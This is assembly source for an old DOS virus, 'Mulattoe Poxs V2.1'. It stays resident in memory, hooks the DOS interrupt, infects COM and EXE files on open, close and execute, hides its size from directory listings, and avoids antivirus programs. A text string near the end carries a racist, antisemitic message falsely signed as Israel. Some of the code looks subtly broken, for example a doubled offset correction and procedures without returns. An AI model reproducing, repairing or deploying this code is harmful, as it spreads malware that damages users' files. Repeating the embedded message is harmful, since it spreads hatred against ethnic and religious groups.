;			-=*=Mulattoe Poxs V2.1=*=-

virus_size      equ     last - init_virus       ;Virus size                
mut1            equ     3                                                  
mut2            equ     1                                                  
mut3            equ     103h                    ;Offset location           
seg_a          segment   byte public                                       
               assume    cs:seg_a, ds:seg_a                                
                org     100h                    ;COM file!                 
rocko           proc    far                                                
start:          jmp     init_virus                                         
;                       Virus Begins Here...                               
init_virus:     call    doit_now                ;Doit VirusMan...          
doit_now:       pop     bp                      ;Not to Lose Track         
                sub     bp,83h                 ;Set our position          
		sub	bp,83h
                push    ax                      ;Save all the regesters    
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    si                                                 
                push    di                                                 
                push    bp                                                 
                push    es                                                 
                push    ds                                                 
                mov     ax,4000h               ;Are we resident Already?  
		add	ax,9cbah
                int     21h                     ;***McAfee Scan String!    
                cmp     bx,0dcbah               ;Yupe... Quit Then...      
                je      exit_com                                           
                push    cs                      ;Get CS=DS                 
                pop     ds                                                 
                mov     cx,es                                              
                mov     ax,3521h                ;Sometimes tend to inter-  
                int     21h                     ;cept this Interrupt...    
                mov     word ptr cs:[int21+2][bp],es    ;Save the Int      
                mov     word ptr cs:[int21][bp],bx      ;Vector Table      
                dec     cx                      ;Get a new Memory block    
                mov     es,cx                   ;Put it Back to ES         
                mov     bx,es:mut1              ;Get TOM size              
                mov     dx,virus_size           ;Virus size in DX          
                mov     cl,4                    ;Shift 4 bits              
                shr     dx,cl                   ;Fast way to divide by 16  
                add     dx,4                    ;add 1 more para segment   
                mov     cx,es                   ;current MCB segment       
                sub     bx,dx                   ;sub virus_size from TOM   
                inc     cx                      ;put back right location   
                mov     es,cx                                              
                mov     ah,4ah                  ;Set_block                 
                int     21h                                                
                jc      exit_com                                           
                mov     ah,48h                  ;now allocate it           
                dec     dx                      ;number of para            
                mov     bx,dx                   ;                          
                int     21h                                                
                jc      exit_com                                           
                dec     ax                      ;get MCB                   
                mov     es,ax                                              
                mov     cx,8h                   ;Made DOS the owner of MCB 
                mov     es:mut2,cx              ;put it...                 
                sub     ax,0fh                  ;get TOM                   
                mov     di,mut3                 ;beginnig of our loc in mem
                mov     es,ax                   ;                          
;               mov     si,bp                   ;delta pointer             
;               add     si,offset init_virus    ;where to start            
		lea	si, [bp+offset init_virus]
                mov     cx,virus_size                                      
                repne   movsb                    ;move us                  
                mov     ax,2521h                ;Restore Int21 with ours   
                mov     dx,offset int21_handler ;Where it starts           
                push    es                                                 
                pop     ds                                                 
                int     21h                                                
exit_com:       push    cs                                                 
                pop     ds                                                 
                cmp     word ptr cs:[buffer][bp],5A4Dh                     
                je      exit_exe_file                                      
;               mov     bx,offset buffer        ;Its a COM file restore    
;               add     bx,bp                   ;First three Bytes...      
		lea	bx, [bp+offset buffer]
                mov     ax,[bx]                 ;Mov the Byte to AX        
                mov     word ptr ds:[100h],ax   ;First two bytes Restored  
                add     bx,2                    ;Get the next Byte         
                mov     al,[bx]                 ;Move the Byte to AL       
                mov     byte ptr ds:[102h],al   ;Restore the Last of 3b    
                pop     ds                                                 
                pop     es                                                 
                pop     bp                      ;Restore Regesters         
                pop     di                                                 
                pop     si                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
;               mov     ax,100h                 ;Jump Back to Beginning    
		mov	ax,0fEffh
		not	ax
                push    ax                      ;Restores our IP (a CALL   
                retn                            ;Saves them, now we changed
command         db      "C:\COMMAND.COM",0                                 
exit_exe_file:  mov     bx,word ptr cs:[vir_cs][bp]     ;fix segment loc   
                mov     dx,cs                           ;                  
                sub     dx,bx                                              
                mov     ax,dx                                              
                add     ax,word ptr cs:[exe_cs][bp]     ;add it to our segs
                add     dx,word ptr cs:[exe_ss][bp]                        
                mov     bx,word ptr cs:[exe_ip][bp]                        
                mov     word ptr cs:[fuck_yeah][bp],bx                     
                mov     word ptr cs:[fuck_yeah+2][bp],ax                   
                mov     ax,word ptr cs:[exe_ip][bp]                        
                mov     word ptr cs:[Rock_fix1][bp],dx                     
                mov     word ptr cs:[Rock_fix2][bp],ax                     
                pop     ds                                                 
                pop     es                                                 
                pop     bp                                                 
                pop     di                                                 
                pop     si                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                db      0B8h                   ;nothing but MOV AX,XXXX    
                dw      0                                                  
                mov     ss,ax                                              
                db      0BCh                   ;nothing but MOV SP,XXXX    
                dw      0                                                  
                db      0EAh                    ;nothing but JMP XXXX:XXXX 
                dd      0                                                  
int21           dd      ?                       ;Our Old Int21             
;                       Dir Handler                                        
old_dir:        call    calldos21               ;get FCB                   
                test    al,al                   ;error?                    
                jnz     old_out                 ;nope                      
                push    ax                                                 
                push    bx                                                 
                push    es                                                 
                mov     ah,51h                  ;get PSP                   
                int     21h                                                
                mov     es,bx                   ;                          
                cmp     bx,es:[16h]             ;                          
                jnz     not_infected                                       
                mov     bx,dx                                              
                mov     al,[bx]                                            
                push    ax                                                 
                mov     ah,2fh                                             
                int     21h                                                
                pop     ax                                                 
                inc     al                       ;Extended FCB?            
                jnz     fcb_okay                                           
                add     bx,7h                                              
fcb_okay:       mov     ax,es:[bx+17h]                                     
                and     ax,1fh                                             
                cmp     al,1eh                                             
                jnz     not_infected                                       
                and     byte ptr es:[bx+17h],0e0h       ;fix secs          
                sub     word ptr es:[bx+1dh],virus_size                    
                sbb     word ptr es:[bx+1fh],0                             
not_infected:   pop     es                                                 
                pop     bx                                                 
                pop     ax                                                 
old_out:        iret                                                       
;                       Int 21 Handler                                     
int21_handler:  cmp     ah,11h                                             
                je      old_dir                                            
                cmp     ah,12h                                             
                je      old_dir                                            
                cmp     ax,4b00h                ;File executed             
                je      dis_infect                                         
                cmp     ah,3dh                                             
                je      check_file                                         
                cmp     ah,3eh                                             
                je      check_file2                                        
;               cmp     ax,0dcbah               ;Virus testing             
		sub	ax,9cbah
		cmp	ax,4000h
		add	ax,9cbah
                jne     int21call                                          
		sub	bx,9cbah
                mov     bx,4000h                                          
		add	bx,9cbah
int21call:      jmp     dword ptr cs:[int21]    ;Split...                  
check_file:     jmp     opening_file            ;Like a Charm              
check_file2:    jmp     closing_file                                       
dis_infect:     call    disinfect               ;EXE & COM okay            
dont_disinfect: push    dx                                                 
                push    cs                                                 
                call    int21call                                          
                pop     dx                                                 
execute:        push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                push    bp                                                 
                push    cs                                                 
                pop     ds                                                 
                mov     dx,offset command                                  
                mov     bp,0dcbah                                          
                jmp     command1                                           
command_ret:    pop     bp                                                 
                pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                call    check_4_av                                         
                jc      exit1                                              
command1:       mov     ax,4300h                ;Get file Attribs          
                call    calldos21                                          
                jc      exit1                                              
                test    cl,1h                   ;Make sure there normal    
                jz      open_file               ;Okay there are            
                and     cl,0feh                 ;Nope, Fix them...         
                mov     ax,4301h                ;Save them now             
                call    calldos21                                          
                jc      exit                                               
open_file:      mov     ax,3D02h                                           
                call    calldos21                                          
exit1:          jc      exit                                               
                xchg    bx,ax                   ;BX File handler           
                mov     ax,5700h                ;Get file TIME + DATE      
                Call    calldos21                                          
                mov     al,cl                                              
                or      cl,1fh                  ;Un mask Seconds           
                dec     cx                      ;60 seconds                
                xor     al,cl                   ;Is it 60 seconds?         
                jz      exit                    ;File already infected     
                push    cs                                                 
                pop     ds                                                 
                mov     word ptr ds:[old_time],cx       ;Save Time         
                mov     word ptr ds:[old_date],dx       ;Save Date         
                mov     ah,3Fh                                             
                mov     cx,1Bh                          ;Read first 1B     
                mov     dx,offset ds:[buffer]           ;into our Buffer   
                call    calldos21                                          
                jc      exit_now                        ;Error Split       
                mov     ax,4202h                        ;Move file pointer 
                xor     cx,cx                           ;to EOF File       
                xor     dx,dx                                              
                call    calldos21                                          
                jc      exit_now                        ;Error Split       
                cmp     word ptr ds:[buffer],5A4Dh      ;Is file an EXE?   
                je      exe_infect                      ;Infect EXE file   
                mov     cx,ax                                              
                sub     cx,3                            ;Set the JMP       
                mov     word ptr ds:[jump_address+1],cx                    
                call    infect_me                       ;Infect!           
                jc      exit                                               
                mov     ah,40h                          ;Write back the    
                mov     dx,offset jump_address                             
                mov     cx,3h                                              
                call    calldos21                                          
                mov     cx,word ptr ds:[old_time]       ;Restore old time  
                mov     dx,word ptr ds:[old_date]       ;Restore Old date  
                mov     ax,5701h                                              
                call    calldos21                                          
                mov     ah,3Eh                                             
                call    calldos21                                          
exit:           cmp     bp,0dcbah                                          
                je      command2                                           
                pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
command2:       jmp     command_ret                                        
exe_infect:     mov     cx,word ptr cs:[buffer+20]                         
                mov     word ptr cs:[exe_ip],cx                            
                mov     cx,word ptr cs:[buffer+22]                         
                mov     word ptr cs:[exe_cs],cx                            
                mov     cx,word ptr cs:[buffer+16]                         
                mov     word ptr cs:[exe_sp],cx                            
                mov     cx,word ptr cs:[buffer+14]                         
                mov     word ptr cs:[exe_ss],cx                            
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                mov     word ptr cs:[vir_cs],dx                            
                push    ax                                                 
                push    dx                                                 
                call    infect_me                                          
                pop     dx                                                 
                pop     ax                                                 
                mov     word ptr cs:[buffer+22],dx                         
                mov     word ptr cs:[buffer+20],ax                         
                pop     dx                                                 
                pop     ax                                                 
                jc      exit                                               
                add     ax,virus_size                                      
                adc     dx,0                                               
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                add     ax,40h                                             
                mov     word ptr cs:[buffer+14],dx                         
                mov     word ptr cs:[buffer+16],ax                         
                pop     dx                                                 
                pop     ax                                                 
                push    bx                                                 
                push    cx                                                 
                mov     cl,7                                               
                shl     dx,cl                                              
                xchg    bx,ax                                              
                mov     cl,9                                               
                shr     bx,cl                                              
                add     dx,bx                                              
                and     ax,1FFh                                            
                jz      outta_here                                         
                inc     dx                                                 
outta_here:     pop     cx                                                 
                pop     bx                                                 
                mov     word ptr cs:[buffer+2],ax                          
                mov     word ptr cs:[buffer+4],dx                          
                mov     ah,40h                                             
                mov     dx,offset ds:[buffer]                              
                mov     cx,20h                                             
                call    calldos21                                          
exit_exe:       jmp     exit_now                                           
rocko           endp                                                       
vir_cs          dw      0                                                  
exe_ip          dw      0                                                  
exe_cs          dw      0                                                  
exe_sp          dw      0                                                  
exe_ss          dw      0                                                  
exe_sz          dw      0                                                  
exe_rm          dw      0                                                  
;                   Opening File handle AX=3D                              
opening_file:   call    check_extension                                    
                jnc     open_fuck2                                         
                call    check_exten_exe                                    
                jnc     open_fuck2                                         
                jmp     dword ptr cs:[int21]                               
open_fuck2:     push    ax                                                 
                mov     ax,3d02h                                           
                call    calldos21                                          
                jnc     open_fuck1                                         
                pop     ax                                                 
open_fuck1:     push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                xchg    bx,ax                                              
                mov     ax,5700h                                           
                call    calldos21                                          
                mov     al,cl                                              
                or      cl,1fh                                             
                dec     cx                      ;60 Seconds                
                xor     al,cl                                              
                jnz     opening_exit3                                      
                dec     cx                                                 
                mov     word ptr cs:[old_time],cx                          
                mov     word ptr cs:[old_date],dx                          
                mov     ax,4202h                ;Yes Pointer to EOF        
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                mov     cx,dx                                              
                mov     dx,ax                                              
                push    cx                                                 
                push    dx                                                 
                sub     dx,1Bh                  ;Get first 3 Bytes         
                sbb     cx,0                                               
                mov     ax,4200h                                           
                call    calldos21                                          
                push    cs                                                 
                pop     ds                                                 
                mov     ah,3fh                  ;Read them into Buffer     
                mov     cx,1Bh                                             
                mov     dx,offset buffer                                   
                call    calldos21                                          
                xor     cx,cx                   ;Goto Beginning of File    
                xor     dx,dx                                              
                mov     ax,4200h                                           
                call    calldos21                                          
                mov     ah,40h                  ;Write first three bytes   
                mov     dx,offset buffer                                   
                mov     cx,1Bh                                             
                cmp     word ptr cs:[buffer],5A4Dh                         
                je      open_exe_jmp                                       
                mov     cx,3h                                              
open_exe_jmp:   call    calldos21                                          
                pop     dx                      ;EOF - Virus_Size          
                pop     cx                      ;to get ORIGINAL File size 
                sub     dx,virus_size                                      
                sbb     cx,0                                               
                mov     ax,4200h                                           
                call    calldos21                                          
                mov     ah,40h                  ;Fix Bytes                 
                xor     cx,cx                                              
                call    calldos21                                          
                mov     cx,word ptr cs:[old_time]                          
                mov     dx,word ptr cs:[old_date]                          
                mov     ax,5701h                                           
                int     21h                                                
                mov     ah,3eh                  ;Close File                
                call    calldos21                                          
opening_exit3:  pop     ds                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]                               
;                   Closing File Handle INFECT it!                         
closing_file:   cmp     bx,0h                                              
                je      closing_bye                                        
                cmp     bx,5h                                              
                ja      close_cont                                         
closing_bye:    jmp     dword ptr cs:[int21]                               
close_cont:     push    ax                                                 
                push    bx                                                 
                push    cx                                                 
                push    dx                                                 
                push    di                                                 
                push    ds                                                 
                push    es                                                 
                push    bp                                                 
                push    bx                                                 
                mov     ax,1220h                                           
                int     2fh                                                
                mov     ax,1216h                                           
                mov     bl,es:[di]                                         
                int     2fh                                                
                pop     bx                                                 
                add     di,0011h                                           
                mov     byte ptr es:[di-0fh],02h                           
                add     di,0017h                                           
                cmp     word ptr es:[di],'OC'                              
                jne     closing_next_try                                   
                cmp     byte ptr es:[di+2h],'M'                            
                jne     pre_exit                                           
                jmp     closing_cunt3                                      
                cmp     word ptr es:[di],'XE'                              
                jne     pre_exit                                           
                cmp     byte ptr es:[di+2h],'E'                            
                jne     pre_exit                                           
closing_cunt:   cmp     word ptr es:[di-8],'CS'                            
                jnz     closing_cunt1              ;SCAN                   
                cmp     word ptr es:[di-6],'NA'                            
                jz      pre_exit                                           
closing_cunt1:  cmp     word ptr es:[di-8],'-F'                            
                jnz     closing_cunt2              ;F-PROT                 
                cmp     word ptr es:[di-6],'RP'                            
                jz      pre_exit                                           
closing_cunt2:  cmp     word ptr es:[di-8],'LC'                            
                jnz     closing_cunt3                                      
                cmp     word ptr es:[di-6],'AE'    ;CLEAN                  
                jnz     closing_cunt3                                      
pre_exit:       jmp     closing_nogood                                     
closing_cunt3:  mov     ax,5700h                                           
                call    calldos21                                          
                mov     al,cl                                              
                or      cl,1fh                                             
                dec     cx                              ;60 Seconds        
                xor     al,cl                                              
                jz      closing_nogood                                     
                push    cs                                                 
                pop     ds                                                 
                mov     word ptr ds:[old_time],cx                          
                mov     word ptr ds:[old_date],dx                          
                mov     ax,4200h                                           
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                mov     ah,3fh                                             
                mov     cx,1Bh                                             
                mov     dx,offset buffer                                   
                call    calldos21                                          
                jc      closing_no_good                                    
                mov     ax,4202h                                           
                xor     cx,cx                                              
                xor     dx,dx                                              
                call    calldos21                                          
                jc      closing_no_good                                    
                cmp     word ptr ds:[buffer],5A4Dh                         
                je      closing_exe                                        
                mov     cx,ax                                              
                sub     cx,3h                                              
                mov     word ptr ds:[jump_address+1],cx                    
                call    infect_me                                          
                jc      closing_no_good                                    
                mov     ah,40h                                             
                mov     dx,offset jump_address                             
                mov     cx,3h                                              
                call    calldos21                                          
                mov     cx,word ptr ds:[old_time]                          
                mov     dx,word ptr ds:[old_date]                          
                mov     ax,5701h                                           
                call    calldos21                                          
closing_nogood: pop     bp                                                 
                pop     es                                                 
                pop     ds                                                 
                pop     di                                                 
                pop     dx                                                 
                pop     cx                                                 
                pop     bx                                                 
                pop     ax                                                 
                jmp     dword ptr cs:[int21]                               
closing_exe:    mov     cx,word ptr cs:[buffer+20]                         
                mov     word ptr cs:[exe_ip],cx                            
                mov     cx,word ptr cs:[buffer+22]                         
                mov     word ptr cs:[exe_cs],cx                            
                mov     cx,word ptr cs:[buffer+16]                         
                mov     word ptr cs:[exe_sp],cx                            
                mov     cx,word ptr cs:[buffer+14]                         
                mov     word ptr cs:[exe_ss],cx                            
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                mov     word ptr cs:[vir_cs],dx                            
                push    ax                                                 
                push    dx                                                 
                call    infect_me                                          
                pop     dx                                                 
                pop     ax                                                 
                mov     word ptr cs:[buffer+22],dx                         
                mov     word ptr cs:[buffer+20],ax                         
                pop     dx                                                 
                pop     ax                                                 
                jc      closing_no_good                                    
                add     ax,virus_size                                      
                adc     dx,0                                               
                push    ax                                                 
                push    dx                                                 
                call    multiply                                           
                sub     dx,word ptr cs:[buffer+8]                          
                add     ax,40h                                             
                mov     word ptr cs:[buffer+14],dx                         
                mov     word ptr cs:[buffer+16],ax                         
                pop     dx                                                 
                pop     ax                                                 
                push    bx                                                 
                push    cx                                                 
                mov     cl,7                                               
                shl     dx,cl                                              
                xchg    bx,ax                                              
                mov     cl,9                                               
                shr     bx,cl                                              
                add     dx,bx                                              
                and     ax,1FFh                                            
                jz      close_split                                        
                inc     dx                                                 
close_split:    pop     cx                                                 
                pop     bx                                                 
                mov     word ptr cs:[buffer+2],ax                          
                mov     word ptr cs:[buffer+4],dx                          
                mov     ah,40h                                             
                mov     dx,offset ds:[buffer]                              
                mov     cx,20h                                             
                call    calldos21                                          
closing_over:   jmp     closing_no_good                                    
;                   Infection Routine...                                   
infect_me       proc                                                       
                mov     ah,40h                                             
                mov     dx,offset init_virus                               
                mov     cx,virus_size                                      
                call    calldos21                                          
                jc      exit_error                      ;Error Split       
                mov     ax,4200h                                           
                xor     cx,cx                           ;Pointer back to   
                xor     dx,dx                           ;top of file       
                call    calldos21                                          
                jc      exit_error                      ;Split Dude...     
                clc                                     ;Clear carry flag  
                stc                                     ;Set carry flag    
infect_me       endp                                                       
;               DisInfection Routine for 4B                                
Disinfect       PROC                                                       
                push    ax                                                 
                push    bx                      ;Save them                 
                push    cx                                                 
                push    dx                                                 
                push    ds                                                 
                mov     ax,4300h                ;Get file Attribs          
                call    calldos21                                          
                test    cl,1h                   ;Test for Normal Attribs   
                jz      okay_dis                ;Yes, File can be opened   
                and     cl,0feh                 ;No, Set them to Normal    
                mov     ax,4301h                ;Save attribs to file      
                call    calldos21                                          
                jc      half_way                                           
okay_dis:       mov     ax,3d02h                ;File now can be opened    
                call    calldos21               ;Safely                    
                jc      half_way                                           
                xchg    bx,ax                   ;Put File Handle in BX     
                mov     ax,5700h                ;Get File Time & Date      
                call    calldos21                                          
                mov     al,cl                   ;Check to see if infected  
                or      cl,1fh                  ;Unmask Seconds            
                dec     cx                      ;Test to see if 60 seconds 
                xor     al,cl                                              
                jnz     half_way                ;No, Quit File AIN'T       
                dec     cx                                                 
                mov     word ptr cs:[old_time],cx                          
                mov     word ptr cs:[old_date],dx                          
                mov     ax,4202h                ;Yes, file is infected     
                xor     cx,cx                   ;Goto the End of File      
                xor     dx,dx                                              
                call    calldos21                                          
                push    cs                                                 
                pop     ds                                                 
                mov     cx,dx                   ;Save Location into        
                mov     dx,ax                   ;CX:DX                     
                push    cx                      ;Push them for later use   
                push    dx                                                 
                sub     dx,1Bh                  ;Subtract file 1Bh from the
                sbb     cx,0                    ;End so you will find the  
                mov     ax,4200h                ;Original EXE header or    
                call    calldos21               ;First 3 bytes for COMs    
                mov     ah,3fh                  ;Read them into Buffer     
                mov     cx,1Bh                  ;Read all of the 1B bytes  
                mov     dx,offset buffer        ;Put them into our buffer  
                call    calldos21                                          
                jmp     half                                               
half_way:       jmp     end_dis                                            
half:           xor     cx,cx                   ;                          
                xor     dx,dx                   ;Goto the BEGINNING of file
                mov     ax,4200h                                           
                call    calldos21                                          
                mov     ah,40h                  ;Write first three bytes   
                mov     dx,offset buffer        ;from buffer to COM        
                mov     cx,1Bh                                             
                cmp     word ptr cs:[buffer],5A4Dh                         
                je      dis_exe_jmp                                        
                mov     cx,3h                                              
dis_exe_jmp:    call    calldos21                                          
                pop     dx                      ;Restore CX:DX which they  
                pop     cx                      ;to the End of FILE        
                sub     dx,virus_size           ;Remove Virus From the END 
                sbb     cx,0                    ;of the Orignal File       
                mov     ax,4200h                ;Get new EOF               
                call    calldos21                                          
                mov     ah,40h                  ;Write new EOF to File     
                xor     cx,cx                                              
                call    calldos21                                          
                mov     cx,word ptr cs:[old_time]                          
                mov     dx,word ptr cs:[old_date]                          
                mov     ax,5701h                                           
                call    calldos21                                          
                mov     ah,3eh                  ;Close File                
                call    calldos21                                          
end_dis:        pop     ds                                                 
                pop     dx                                                 
                pop     cx                      ;Restore 'em               
                pop     bx                                                 
                pop     ax                                                 
disinfect       ENDP                                                       
;               Check File Extension DS:DX ASCIIZ                          
Check_extension         PROC                                               
                push    si                                                 
                push    cx                                                 
                mov     si,dx                                              
                mov     cx,256h                                            
loop_me:        cmp     byte ptr ds:[si],2eh                               
                je      next_ok                                            
                inc     si                                                 
                loop    loop_me                                            
next_ok:        cmp     word ptr ds:[si+1],'OC'                            
                jne     next_1                                             
                cmp     byte ptr ds:[si+3],'M'                             
                je      good_file                                          
next_1:         cmp     word ptr ds:[si+1],'oc'                            
                jne     next_2                                             
                cmp     byte ptr ds:[si+3],'m'                             
                je      good_file                                          
next_2:         pop     cx                                                 
                pop     si                                                 
good_file:      pop     cx                                                 
                pop     si                                                 
Check_extension         ENDP                                               
;               Check File Extension DS:DX ASCIIZ                          
Check_exten_exe         PROC                                               
                push    si                                                 
                push    cx                                                 
                mov     si,dx                                              
                mov     cx,256h                                            
loop_me_exe:    cmp     byte ptr ds:[si],2eh                               
                je      next_ok_exe                                        
                inc     si                                                 
                loop    loop_me_exe                                        
next_ok_exe:    cmp     word ptr ds:[si+1],'XE'                            
                jne     next_1_exe                                         
                cmp     byte ptr ds:[si+3],'E'                             
                je      good_file_exe                                      
next_1_exe:     cmp     word ptr ds:[si+1],'xe'                            
                jne     next_2_exe                                         
                cmp     byte ptr ds:[si+3],'e'                             
                je      good_file_exe                                      
next_2_exe:     pop     cx                                                 
                pop     si                                                 
good_file_exe:  pop     cx                                                 
                pop     si                                                 
Check_exten_exe         ENDP                                               
;                    Call Int_21h Okay                                     
calldos21        PROC                                                      
                call    dword ptr cs:[int21]                               
calldos21        ENDP                                                      
;                    MultiPly                                              
multiply         PROC                                                      
                push    bx                                                 
                push    cx                                                 
                mov     cl,0Ch                                             
                shl     dx,cl                                              
                xchg    bx,ax                                              
                mov     cl,4                                               
                shr     bx,cl                                              
                and     ax,0Fh                                             
                add     dx,bx                                              
                pop     cx                                                 
                pop     bx                                                 
multiply         ENDP                                                      
;               Check for AV file... Like SCAN.EXE or F-PROT.EXE           
Check_4_av              PROC                                               
                push    si                                                 
                push    cx                                                 
                mov     si,dx                                              
                mov     cx,256h                                            
av:             cmp     byte ptr ds:[si],2eh                               
                je      av1                                                
                inc     si                                                 
                loop    av                                                 
av1:            cmp     word ptr ds:[si-2],'NA'                            
                jnz     av2                                                
                cmp     word ptr ds:[si-4],'CS'                            
                jz      fuck_av                                            
av2:            cmp     word ptr ds:[si-2],'NA'                            
                jnz     av3                                                
                cmp     word ptr ds:[si-4],'EL'                            
                jz      fuck_av                                            
av3:            cmp     word ptr ds:[si-2],'TO'                            
                jnz     not_av                                             
                cmp     word ptr ds:[si-4],'RP'                            
                jz      fuck_av                                            
not_av:         pop     cx                                                 
                pop     si                                                 
fuck_av:        pop     cx                                                 
                pop     si                                                 
Check_4_av              ENDP                                               
msg             db      "Death by Miscgenation DIE WHITE GOYIM DIE! '94(c) IsRaEl"
old_time        dw      0                                                  
old_date        dw      0                                                  
file_handle     dw      0                                                  
jump_address    db      0E9h,90h,90h                                       
buffer          db      90h,0CDh,020h           ;\                         
                db      18h DUP (00)            ;-Make 1Bh Bytes           
seg_a           ends                                                       
          end  start